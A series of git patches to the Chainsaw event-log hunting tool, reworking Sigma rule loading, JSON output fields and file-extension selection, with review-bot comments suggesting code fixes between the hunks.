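Review bot: The rewritten `Kind::from_str` error reads `"unknown kind, must be: chainsaw, or sigma"`; the comma before `or` is a leftover from the three-item list and should be `"unknown kind, must be: chainsaw or sigma"`. The `FromStr` impls for `Kind`, `Level` and `Status` are all exact-case matches, so `--level High` is rejected with that same kind of message; if that is not intended, `match s.to_ascii_lowercase().as_str() {` in each makes the CLI forgiving while serde's `rename_all = "snake_case"` keeps rule files strict. There is also no blank line between the closing brace of `impl FromStr for Status` and `pub fn load(`, and rustfmt will not add one, so add it by hand.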
@@ -71,139 +206,64 @@ pub fn load_rule( anyhow::bail!("rule must have a yaml file extension"); } } - - // This is a bit crude but we try all formats then report the errors... - let mut rules = if let Ok(rule) = chainsaw::load(path) { - if let Some(kinds) = kinds.as_ref() { - if !kinds.contains(&Kind::Chainsaw) { - return Ok(vec![]); - } - } - vec![Rule { - chainsaw: rule, - kind: Kind::Chainsaw, - }] - } else if let Ok(rules) = sigma::load(path) { - if !mapping { - // Hacky way of exposing rule types from load_rule function - anyhow::bail!("sigma-no-mapping"); - } - if let Some(kinds) = kinds.as_ref() { - if !kinds.contains(&Kind::Sigma) { - return Ok(vec![]); + let mut rules = match kind { + Kind::Chainsaw => { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Chainsaw) { + return Ok(vec![]); + } } + let rule = chainsaw::load(path)?; + vec![Rule::Chainsaw(rule)] } - let sigma = match rules - .into_iter() - .map(|y| serde_yaml::from_value::(y)) - .collect::, _>>() - { - Ok(rules) => rules, - Err(_) => { - anyhow::bail!("failed to load rule, run the linter for more information"); - } - }; - sigma - .into_iter() - .map(|rule: Sigma| Rule { - chainsaw: Chainsaw { - name: rule.name, - group: "".to_owned(), - description: rule.description, - authors: rule.authors, - // NOTE: A fake value as this is not used for non chainsaw rules - kind: FileKind::Evtx, - level: rule - .level - .map(|l| match l.as_str() { - "critical" => chainsaw::Level::Critical, - "high" => chainsaw::Level::High, - "medium" => chainsaw::Level::Medium, - "low" => chainsaw::Level::Low, - _ => chainsaw::Level::Info, - }) - .unwrap_or_else(|| chainsaw::Level::Info), - status: rule - .status - .map(|s| match s.as_str() { - "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Experimental, - }) - .unwrap_or_else(|| chainsaw::Status::Experimental), - timestamp: "".to_owned(), - - fields: vec![], - - filter: chainsaw::Filter::Detection( - 
rule.tau.optimise(Default::default()).detection, - ), - - aggregate: rule.aggregate.map(|a| chainsaw::Aggregate { - count: a.count, - fields: a.fields, - }), - }, - kind: Kind::Sigma, - }) - .collect() - } else if let Ok(rule) = stalker::load(path) { - if let Some(kinds) = kinds.as_ref() { - if !kinds.contains(&Kind::Stalker) { - return Ok(vec![]); + Kind::Sigma => { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Sigma) { + return Ok(vec![]); + } } + let sigma = match sigma::load(path)? + .into_iter() + .map(|y| serde_yaml::from_value::(y)) + .collect::, _>>() + { + Ok(rules) => rules, + Err(_) => { + anyhow::bail!("failed to load rule, run the linter for more information"); + } + }; + sigma + .into_iter() + .map(|mut s| { + s.tau.detection.expression = optimiser::coalesce( + s.tau.detection.expression, + &s.tau.detection.identifiers, + ); + s.tau.detection.identifiers.clear(); + s.tau.detection.expression = optimiser::shake(s.tau.detection.expression); + s.tau.detection.expression = optimiser::rewrite(s.tau.detection.expression); + s.tau.detection.expression = optimiser::matrix(s.tau.detection.expression); + Rule::Sigma(s) + }) + .collect() } - vec![Rule { - chainsaw: Chainsaw { - name: rule.tag, - group: "".to_owned(), - description: rule.description, - authors: rule.authors, - // NOTE: A fake value as this is not used for non chainsaw rules - kind: FileKind::Evtx, - level: match rule.level.as_str() { - "critical" => chainsaw::Level::Critical, - "high" => chainsaw::Level::High, - "medium" => chainsaw::Level::Medium, - "low" => chainsaw::Level::Low, - _ => chainsaw::Level::Info, - }, - status: match rule.status.as_str() { - "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Experimental, - }, - timestamp: "".to_owned(), - - fields: vec![], - - filter: chainsaw::Filter::Detection( - rule.tau.optimise(Default::default()).detection, - ), - - aggregate: None, - }, - kind: Kind::Stalker, - }] - } else { - anyhow::bail!("failed to load 
rule, run the linter for more information"); }; - if let Some(levels) = levels.as_ref() { rules = rules .into_iter() - .filter(|r| levels.contains(&r.chainsaw.level)) + .filter(|r| levels.contains(&r.level())) .collect(); } if let Some(statuses) = statuses.as_ref() { rules = rules .into_iter() - .filter(|r| statuses.contains(&r.chainsaw.status)) + .filter(|r| statuses.contains(&r.status())) .collect(); } - Ok(rules) } -pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { +pub fn lint(kind: &Kind, path: &Path) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); @@ -237,14 +297,6 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { } } }, - Kind::Stalker => match stalker::load(path) { - Ok(rule) => { - vec![Filter::Detection(rule.tau.detection)] - } - Err(e) => { - anyhow::bail!("{}", e); - } - }, }; Ok(detections) } diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 891a7e7d..052a39fb 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -9,6 +9,8 @@ use serde::{Deserialize, Serialize}; use serde_yaml::{Mapping, Sequence, Value as Yaml}; use tau_engine::Rule as Tau; +use super::{Level, Status}; + #[derive(Clone, Debug, Deserialize)] #[serde(rename_all = "lowercase")] pub struct Rule { @@ -18,12 +20,12 @@ pub struct Rule { pub tau: Tau, #[serde(default)] - pub aggregate: Option, + pub aggregate: Option, pub authors: Vec, pub description: String, - pub level: Option, - pub status: Option, + pub level: Level, + pub status: Status, } #[derive(Clone, Debug, Deserialize, Serialize)] 
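Review bot: In the `Kind::Sigma` arm the `Err(_)` discards the serde error, so a rule that fails `serde_yaml::from_value` only reports `failed to load rule, run the linter for more information` and the user has to re-run with the linter to learn which field was wrong, whereas the `Kind::Chainsaw` arm propagates the cause with `?`. Keeping the message and the cause is a one-line change: `Err(e) => anyhow::bail!("failed to load rule ({}), run the linter for more information", e),`. `load` also has no doc comment; two `///` lines stating that `kind` selects the parser and that `kinds`, `levels` and `statuses` are optional allow-lists applied after parsing would help callers. The signature of `load` sits in the preceding hunk, so the function starts outside this one.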
@@ -71,9 +73,13 @@ impl Sigma { tau.insert("title".into(), header.title.into()); tau.insert("description".into(), header.description.into()); if let Some(status) = header.status { + let status = match status.as_str() { + "stable" => status.to_owned(), + _ => "experimental".to_owned(), + }; tau.insert("status".into(), status.into()); } else { - tau.insert("status".into(), "testing".into()); + tau.insert("status".into(), "experimental".into()); } if let Some(references) = header.references { tau.insert("references".into(), references.into()); @@ -676,8 +682,14 @@ pub fn load(rule: &Path) -> Result> { }?; let tau = detections_to_tau(detection)?; let mut rule = base.clone(); - if let Some(level) = main.level.as_ref() { - rule.insert("level".into(), level.clone().into()); + if let Some(level) = &main.level { + let level = match level.as_str() { + "critical" | "high" | "medium" | "low" => level.to_owned(), + _ => "info".to_owned(), + }; + rule.insert("level".into(), level.into()); + } else { + rule.insert("level".into(), "info".into()); } for (k, v) in tau { rule.insert(k, v); diff --git a/src/rule/stalker.rs b/src/rule/stalker.rs deleted file mode 100644 index 729d0fee..00000000 --- a/src/rule/stalker.rs +++ /dev/null @@ -1,25 +0,0 @@ -use std::fs::File; -use std::io::Read; -use std::path::Path; - -use serde::Deserialize; -use tau_engine::Rule as Tau; - -#[derive(Clone, Debug, Deserialize)] -pub struct Rule { - pub tag: String, - pub tau: Tau, - pub description: String, - pub level: String, - pub status: String, - pub authors: Vec, -} - -pub fn load(rule: &Path) -> crate::Result { - let mut file = File::open(rule)?; - let mut contents = String::new(); - file.read_to_string(&mut contents)?; - - let rule: Rule = serde_yaml::from_str(&contents)?; - Ok(rule) -} From fa3bf2c51a5e4ef2664227ac25f9bfa16f0be692 Mon Sep 17 00:00:00 2001 
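Review bot: The status normalisation in `impl Sigma` folds every value other than `"stable"` into `"experimental"` without leaving any trace, so a rule marked `deprecated` or `unsupported` (both valid Sigma statuses) is loaded and evaluated as if it were merely experimental. The same silent fallback is introduced for `level` in the `@@ -676,8 +682,14 @@` hunk of this file, where a typo such as `hihg` quietly becomes `info` and may then be dropped by the level filter in `rule::load` without the author ever noticing. A comment above each match, e.g. `// Sigma allows more statuses than chainsaw models; anything but "stable" is treated as experimental`, would make the intent explicit, and a `cs_eyellowln!` when a value is rewritten would surface typos at load time. Both enclosing functions start outside their hunks.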
From: Alex Kornitzer Date: Sun, 3 Jul 2022 14:36:03 +0100 Subject: [PATCH 47/77] refactor: move chainsaw_rules back to rules --- {chainsaw_rules => rules}/account_tampering/new_user_created.yml | 0 .../account_tampering/user_added_to_global_group.yml | 0 .../account_tampering/user_added_to_local_group.yml | 0 .../account_tampering/user_added_to_universal_group.yml | 0 {chainsaw_rules => rules}/antivirus/f-secure.yml | 0 {chainsaw_rules => rules}/antivirus/kaspersky.yml | 0 {chainsaw_rules => rules}/antivirus/sophos.yml | 0 {chainsaw_rules => rules}/antivirus/windows_defender.yml | 0 {chainsaw_rules => rules}/lateral_movement/batch_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/interactive_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/network_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/rdp_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/service_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/unlock_logon.yml | 0 .../log_tampering/security_audit_log_was_cleared.yml | 0 .../log_tampering/system_log_was_cleared.yml | 0 {chainsaw_rules => rules}/login_attacks/account_brute_force.yml | 0 {chainsaw_rules => rules}/service_tampering/event_log.yml | 0 18 files changed, 0 insertions(+), 0 deletions(-) rename {chainsaw_rules => rules}/account_tampering/new_user_created.yml (100%) rename {chainsaw_rules => rules}/account_tampering/user_added_to_global_group.yml (100%) rename {chainsaw_rules => rules}/account_tampering/user_added_to_local_group.yml (100%) rename {chainsaw_rules => rules}/account_tampering/user_added_to_universal_group.yml (100%) rename {chainsaw_rules => rules}/antivirus/f-secure.yml (100%) rename {chainsaw_rules => rules}/antivirus/kaspersky.yml (100%) rename {chainsaw_rules => rules}/antivirus/sophos.yml (100%) rename {chainsaw_rules => rules}/antivirus/windows_defender.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/batch_logon.yml (100%) rename {chainsaw_rules => 
rules}/lateral_movement/interactive_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/network_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/rdp_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/service_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/unlock_logon.yml (100%) rename {chainsaw_rules => rules}/log_tampering/security_audit_log_was_cleared.yml (100%) rename {chainsaw_rules => rules}/log_tampering/system_log_was_cleared.yml (100%) rename {chainsaw_rules => rules}/login_attacks/account_brute_force.yml (100%) rename {chainsaw_rules => rules}/service_tampering/event_log.yml (100%) diff --git a/chainsaw_rules/account_tampering/new_user_created.yml b/rules/account_tampering/new_user_created.yml similarity index 100% rename from chainsaw_rules/account_tampering/new_user_created.yml rename to rules/account_tampering/new_user_created.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_global_group.yml rename to rules/account_tampering/user_added_to_global_group.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_local_group.yml rename to rules/account_tampering/user_added_to_local_group.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_universal_group.yml rename to rules/account_tampering/user_added_to_universal_group.yml 
diff --git a/chainsaw_rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml similarity index 100% rename from chainsaw_rules/antivirus/f-secure.yml rename to rules/antivirus/f-secure.yml diff --git a/chainsaw_rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml similarity index 100% rename from chainsaw_rules/antivirus/kaspersky.yml rename to rules/antivirus/kaspersky.yml diff --git a/chainsaw_rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml similarity index 100% rename from chainsaw_rules/antivirus/sophos.yml rename to rules/antivirus/sophos.yml diff --git a/chainsaw_rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml similarity index 100% rename from chainsaw_rules/antivirus/windows_defender.yml rename to rules/antivirus/windows_defender.yml diff --git a/chainsaw_rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/batch_logon.yml rename to rules/lateral_movement/batch_logon.yml diff --git a/chainsaw_rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/interactive_logon.yml rename to rules/lateral_movement/interactive_logon.yml diff --git a/chainsaw_rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/network_logon.yml rename to rules/lateral_movement/network_logon.yml diff --git a/chainsaw_rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/rdp_logon.yml rename to rules/lateral_movement/rdp_logon.yml diff --git a/chainsaw_rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/service_logon.yml rename to rules/lateral_movement/service_logon.yml 
diff --git a/chainsaw_rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/unlock_logon.yml rename to rules/lateral_movement/unlock_logon.yml diff --git a/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml similarity index 100% rename from chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml rename to rules/log_tampering/security_audit_log_was_cleared.yml diff --git a/chainsaw_rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml similarity index 100% rename from chainsaw_rules/log_tampering/system_log_was_cleared.yml rename to rules/log_tampering/system_log_was_cleared.yml diff --git a/chainsaw_rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml similarity index 100% rename from chainsaw_rules/login_attacks/account_brute_force.yml rename to rules/login_attacks/account_brute_force.yml diff --git a/chainsaw_rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml similarity index 100% rename from chainsaw_rules/service_tampering/event_log.yml rename to rules/service_tampering/event_log.yml From 320e2fff894d36ddc9280a7bd10f056edfa83776 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 3 Jul 2022 15:32:18 +0100 Subject: [PATCH 48/77] feat: add in additional sigma fields to json output --- src/cli.rs | 47 +++++++++++++++++++++++++++++++++---------- src/main.rs | 11 ++++++++-- src/rule/sigma.rs | 51 ++++++++++++++++++++++++++++++++++++++++++++--- 3 files changed, 94 insertions(+), 15 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 1974e42b..8d4badaa 100644 --- a/src/cli.rs +++ b/src/cli.rs 
@@ -559,6 +559,21 @@ pub struct Detection<'a> { pub level: &'a Level, pub source: RuleKind, pub status: &'a Status, + + #[serde(skip_serializing_if = "Option::is_none")] + pub sigma: Option>, +} + +#[derive(Debug, Serialize)] +pub struct Sigma<'a> { + #[serde(skip_serializing_if = "Option::is_none")] + pub id: &'a Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub logsource: &'a Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub references: &'a Option>, + #[serde(skip_serializing_if = "Option::is_none")] + pub tags: &'a Option>, } pub fn print_json( @@ -600,17 +615,29 @@ pub fn print_json( source: RuleKind::Chainsaw, status: &c.status, timestamp: localised, + + sigma: None, }), - Rule::Sigma(s) => detections.push(Detection { - authors: &s.authors, - group: &hunt.group, - kind: &d.kind, - level: &s.level, - name: &s.name, - source: RuleKind::Sigma, - status: &s.status, - timestamp: localised, - }), + Rule::Sigma(s) => { + let sigma = Sigma { + id: &s.id, + logsource: &s.logsource, + references: &s.references, + tags: &s.tags, + }; + detections.push(Detection { + authors: &s.authors, + group: &hunt.group, + kind: &d.kind, + level: &s.level, + name: &s.name, + source: RuleKind::Sigma, + status: &s.status, + timestamp: localised, + + sigma: Some(sigma), + }) + } } } detections diff --git a/src/main.rs b/src/main.rs index d24b230f..7e1ea627 100644 --- a/src/main.rs +++ b/src/main.rs @@ -227,7 +227,7 @@ fn run() -> Result<()> { match opts.cmd { Command::Hunt { rules, - path, + mut path, mapping, rule, @@ -255,7 +255,13 @@ fn run() -> Result<()> { if !opts.no_banner { print_title(); } - let mut rules = vec![rules]; + let mut rs = vec![]; + if path.is_empty() { + path = vec![rules]; + } else { + rs = vec![rules]; + } + let mut rules = rs; if let Some(rule) = rule { rules.extend(rule) }; 
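Review bot: The new block in `run()` reuses the `rules` positional as the event-log path whenever `path` is empty, presumably so that a single positional argument is taken as the path, but nothing says so and the throwaway `rs` binding obscures it further. A comment such as `// Only one positional given: treat it as the event-log path; rules then come from the rule/sigma options.` plus a single binding, `let (mut rules, path) = if path.is_empty() { (vec![], vec![rules]) } else { (vec![rules], path) };`, states the rule in one place and would likely make the `mut path` change in the `@@ -227,7 +227,7 @@` hunk unnecessary. `run` starts and ends outside this hunk.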
@@ -273,6 +279,7 @@ fn run() -> Result<()> { "[+] Loading detection rules from: {}", rules .iter() + .chain(sigma.iter()) .map(|r| r.display().to_string()) .collect::>() .join(", ") diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 052a39fb..e67b6f81 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -26,6 +26,15 @@ pub struct Rule { pub description: String, pub level: Level, pub status: Status, + + #[serde(default)] + pub id: Option, + #[serde(default)] + pub logsource: Option, + #[serde(default)] + pub references: Option>, + #[serde(default)] + pub tags: Option>, } #[derive(Clone, Debug, Deserialize, Serialize)] @@ -51,19 +60,37 @@ struct Header { #[serde(default)] pub author: Option, #[serde(default)] + pub id: Option, + #[serde(default)] + pub logsource: Option, + #[serde(default)] pub references: Option>, #[serde(default)] pub status: Option, + #[serde(default)] + pub tags: Option>, +} + +#[derive(Clone, Debug, Deserialize, Serialize)] +pub struct LogSource { + #[serde(default, skip_serializing_if = "Option::is_none")] + pub category: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub definition: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub product: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub service: Option, } #[derive(Clone, Deserialize)] struct Sigma { + #[serde(default)] + pub detection: Option, #[serde(default, flatten)] pub header: Option
, #[serde(default)] pub level: Option, - #[serde(default)] - pub detection: Option, } impl Sigma { @@ -81,9 +108,21 @@ impl Sigma { } else { tau.insert("status".into(), "experimental".into()); } + if let Some(id) = header.id { + tau.insert("id".into(), id.into()); + } + if let Some(logsource) = header.logsource { + tau.insert( + "logsource".into(), + serde_yaml::to_value(logsource).expect("could not serialise logsource"), + ); + } if let Some(references) = header.references { tau.insert("references".into(), references.into()); } + if let Some(tags) = header.tags { + tau.insert("tags".into(), tags.into()); + } if let Some(author) = header.author { tau.insert( "authors".into(), @@ -711,8 +750,14 @@ pub fn load(rule: &Path) -> Result> { if let Some(detection) = main.detection { let (detection, agg) = prepare(detection, None)?; let tau = detections_to_tau(detection)?; - if let Some(level) = main.level { + if let Some(level) = &main.level { + let level = match level.as_str() { + "critical" | "high" | "medium" | "low" => level.to_owned(), + _ => "info".to_owned(), + }; rule.insert("level".into(), level.into()); + } else { + rule.insert("level".into(), "info".into()); } for (k, v) in tau { rule.insert(k, v); From 7544b8ad45b39446d8c4c9131ba9099241838afd Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 3 Jul 2022 15:38:58 +0100 Subject: [PATCH 49/77] feat: add in false positives for sigma rules too --- src/cli.rs | 3 +++ src/rule/sigma.rs | 7 +++++++ 2 files changed, 10 insertions(+) diff --git a/src/cli.rs b/src/cli.rs index 8d4badaa..086d96f7 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -566,6 +566,8 @@ pub struct Detection<'a> { #[derive(Debug, Serialize)] pub struct Sigma<'a> { + #[serde(skip_serializing_if = "Option::is_none")] + pub falsepositives: &'a Option>, #[serde(skip_serializing_if = "Option::is_none")] pub id: &'a Option, #[serde(skip_serializing_if = "Option::is_none")] 
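Review bot: The level normalisation added here is a verbatim copy of the block introduced in the earlier `@@ -676,8 +682,14 @@` hunk of `src/rule/sigma.rs`, so the accepted level names now live in two places and will drift the first time one of them is edited. A small helper keeps the mapping in one spot and documents the fallback; the sketch below assumes `main.level` is an `Option<String>`, as the `as_str()` call suggests. `load` starts and ends outside this hunk.
```rust
/// Fold a Sigma `level` into the values chainsaw models; unknown or missing levels become "info".
fn normalise_level(level: Option<&String>) -> String {
    match level.map(String::as_str) {
        Some(l @ ("critical" | "high" | "medium" | "low")) => l.to_owned(),
        _ => "info".to_owned(),
    }
}

// … at both call sites, replacing the if/else:
rule.insert("level".into(), normalise_level(main.level.as_ref()).into());
```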
@@ -620,6 +622,7 @@ pub fn print_json( }), Rule::Sigma(s) => { let sigma = Sigma { + falsepositives: &s.falsepositives, id: &s.id, logsource: &s.logsource, references: &s.references, diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index e67b6f81..21fa84fe 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -27,6 +27,8 @@ pub struct Rule { pub level: Level, pub status: Status, + #[serde(default)] + pub falsepositives: Option>, #[serde(default)] pub id: Option, #[serde(default)] @@ -60,6 +62,8 @@ struct Header { #[serde(default)] pub author: Option, #[serde(default)] + pub falsepositives: Option>, + #[serde(default)] pub id: Option, #[serde(default)] pub logsource: Option, @@ -108,6 +112,9 @@ impl Sigma { } else { tau.insert("status".into(), "experimental".into()); } + if let Some(falsepositives) = header.falsepositives { + tau.insert("falsepositives".into(), falsepositives.into()); + } if let Some(id) = header.id { tau.insert("id".into(), id.into()); } From ede5c85de07fd09a6054e739e6b56dbf8876912c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 4 Jul 2022 19:19:10 +0100 Subject: [PATCH 50/77] feat: parse rule and mapping files to determine file extensions to load --- src/file/mod.rs | 24 +++++++++---- src/hunt.rs | 20 +++++++++-- src/lib.rs | 2 +- src/main.rs | 94 +++++++++++++++++++++++++++++++++++++++++-------- src/rule/mod.rs | 9 +++++ 5 files changed, 125 insertions(+), 24 deletions(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index c0245a60..22fa7349 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -1,3 +1,4 @@ +use std::collections::HashSet; use std::fs; use std::path::{Path, PathBuf}; @@ -22,7 +23,7 @@ pub struct Documents<'a> { iterator: Box> + 'a>, } -#[derive(Clone, Debug, PartialEq, Deserialize, Serialize)] +#[derive(Clone, Debug, PartialEq, Deserialize, Serialize, Hash, Eq)] #[serde(rename_all = "snake_case")] pub enum Kind { Evtx, 
@@ -31,6 +32,17 @@ pub enum Kind { Unknown, } +impl Kind { + pub fn extensions(&self) -> Option> { + match self { + Kind::Evtx => Some(vec!["evtx".to_string()]), + Kind::Json => Some(vec!["json".to_string()]), + Kind::Xml => Some(vec!["xml".to_string()]), + Kind::Unknown => None, + } + } +} + impl<'a> Iterator for Documents<'a> { type Item = crate::Result; @@ -86,7 +98,7 @@ impl Reader { }) } else { anyhow::bail!( - "file type is not currently supported - {}", + "file type is not currently supported - {}, use --skip-errors to continue", file.display() ) } @@ -161,7 +173,7 @@ impl Reader { pub fn get_files( path: &PathBuf, - extension: &Option, + extensions: &Option>, skip_errors: bool, ) -> crate::Result> { let mut files: Vec = vec![]; @@ -201,11 +213,11 @@ pub fn get_files( } } }; - files.extend(get_files(&dir.path(), extension, skip_errors)?); + files.extend(get_files(&dir.path(), extensions, skip_errors)?); } - } else if let Some(extension) = extension { + } else if let Some(e) = extensions { if let Some(ext) = path.extension() { - if ext == extension.as_str() { + if e.contains(&ext.to_string_lossy().into_owned()) { files.push(path.to_path_buf()); } } diff --git a/src/hunt.rs b/src/hunt.rs index 35ffbe12..48752926 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -359,8 +359,8 @@ impl Hunt { } pub struct HunterInner { - hunts: Vec, - rules: BTreeMap, + pub hunts: Vec, + pub rules: BTreeMap, load_unknown: bool, local: bool, @@ -371,7 +371,7 @@ pub struct HunterInner { } pub struct Hunter { - inner: HunterInner, + pub inner: HunterInner, } impl Hunter { 
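Review bot: The extension check in `get_files` is a case-sensitive set lookup, `e.contains(&ext.to_string_lossy().into_owned())`, while the set is now filled from `Kind::extensions` with lowercase names, so files such as `Security.EVTX` copied off a Windows host are silently skipped instead of hunted. Comparing case-insensitively, `if e.iter().any(|x| x.eq_ignore_ascii_case(&ext.to_string_lossy())) {`, avoids that without touching the callers. `Kind::extensions` also allocates a fresh `Vec<String>` on every call; returning `&'static [&'static str]` would be cheaper and make the "unknown has no extensions" case read better. `get_files` is recursive and starts outside this hunk.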
@@ -607,6 +607,20 @@ impl Hunter { pub fn rules(&self) -> &BTreeMap { &self.inner.rules } + pub fn extensions(&self) -> HashSet { + let mut extensions = HashSet::new(); + for rule in &self.inner.rules { + if let Some(e) = FileKind::extensions(&rule.1.types()) { + extensions.extend(e.iter().cloned()); + } + } + for hunt in &self.inner.hunts { + if let Some(e) = FileKind::extensions(&hunt.file) { + extensions.extend(e.iter().cloned()); + } + } + extensions + } fn skip(&self, timestamp: NaiveDateTime) -> crate::Result { if self.inner.from.is_some() || self.inner.to.is_some() { diff --git a/src/lib.rs b/src/lib.rs index d69a30d3..ebb9476b 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -3,7 +3,7 @@ extern crate anyhow; pub(crate) use anyhow::Result; -pub use file::{evtx, get_files, Reader}; +pub use file::{evtx, get_files, Kind as FileKind, Reader}; pub use hunt::{Hunter, HunterBuilder}; pub use rule::{ lint, load, sigma, Filter, Kind as RuleKind, Level as RuleLevel, Status as RuleStatus, diff --git a/src/main.rs b/src/main.rs index 7e1ea627..6832b230 100644 --- a/src/main.rs +++ b/src/main.rs @@ -54,8 +54,8 @@ enum Command { #[structopt(group = "format", long = "csv", requires("output"))] csv: bool, /// Only hunt through files with the provided extension. - #[structopt(long = "extension")] - extension: Option, + #[structopt(long = "extension", number_of_values = 1)] + extension: Option>, /// The timestamp to hunt from. Drops any documents older than the value provided. #[structopt(long = "from")] from: Option, @@ -129,8 +129,8 @@ enum Command { regexp: Option>, /// Only search through files with the provided extension. - #[structopt(long = "extension")] - extension: Option, + #[structopt(long = "extension", number_of_values = 1)] + extension: Option>, /// The timestamp to search from. Drops any documents older than the value provided. #[structopt(long = "from")] from: Option, 
@@ -267,14 +267,6 @@ fn run() -> Result<()> { }; let sigma = sigma.unwrap_or_default(); - cs_eprintln!( - "[+] Loading event logs from: {}", - path.iter() - .map(|p| p.display().to_string()) - .collect::>() - .join(", ") - ); - cs_eprintln!( "[+] Loading detection rules from: {}", rules @@ -364,10 +356,54 @@ fn run() -> Result<()> { hunter = hunter.to(to); } let hunter = hunter.build()?; + + /* if no user-defined extensions are specified, then we parse rules and + mappings to build a list of file extensions that should be loaded */ + let mut scratch = HashSet::new(); + let message; + let exts = if load_unknown { + message = "*".to_string(); + None + } else { + scratch.extend(hunter.extensions()); + if scratch.is_empty() { + return Err(anyhow::anyhow!( + "No valid file extensions for the 'kind' specified in the mapping or rules files" + )); + } + if let Some(e) = extension { + // User has provided specific extensions + scratch = scratch + .intersection(&HashSet::from_iter(e.iter().cloned())) + .cloned() + .collect(); + if scratch.is_empty() { + return Err(anyhow::anyhow!( + "The specified file extension is not supported. Use --load-unknown to force loading", + )); + } + }; + message = scratch + .iter() + .map(|x| format!(".{}", x)) + .collect::>() + .join(", "); + Some(scratch) + }; + + cs_eprintln!( + "[+] Loading event logs from: {} (extensions: {})", + path.iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", "), + message + ); + let mut files = vec![]; let mut size = ByteSize::mb(0); for path in &path { - let res = get_files(path, &extension, skip_errors)?; + let res = get_files(path, &exts, skip_errors)?; for i in &res { size += i.metadata()?.len(); } 
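Review bot: User-supplied `extension` values are intersected with the rule-derived set verbatim, so `--extension .evtx` or `--extension EVTX` presumably ends in `The specified file extension is not supported` even though the files would be read fine. Normalising first, `let wanted: HashSet<String> = e.iter().map(|x| x.trim_start_matches('.').to_ascii_lowercase()).collect();` followed by `scratch = scratch.intersection(&wanted).cloned().collect();`, matches what `Kind::extensions` produces. The deferred `let message;` assignment also reads awkwardly; having the `if` evaluate to `(Option<HashSet<String>>, String)` keeps both values together. `run` starts and ends outside this hunk.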
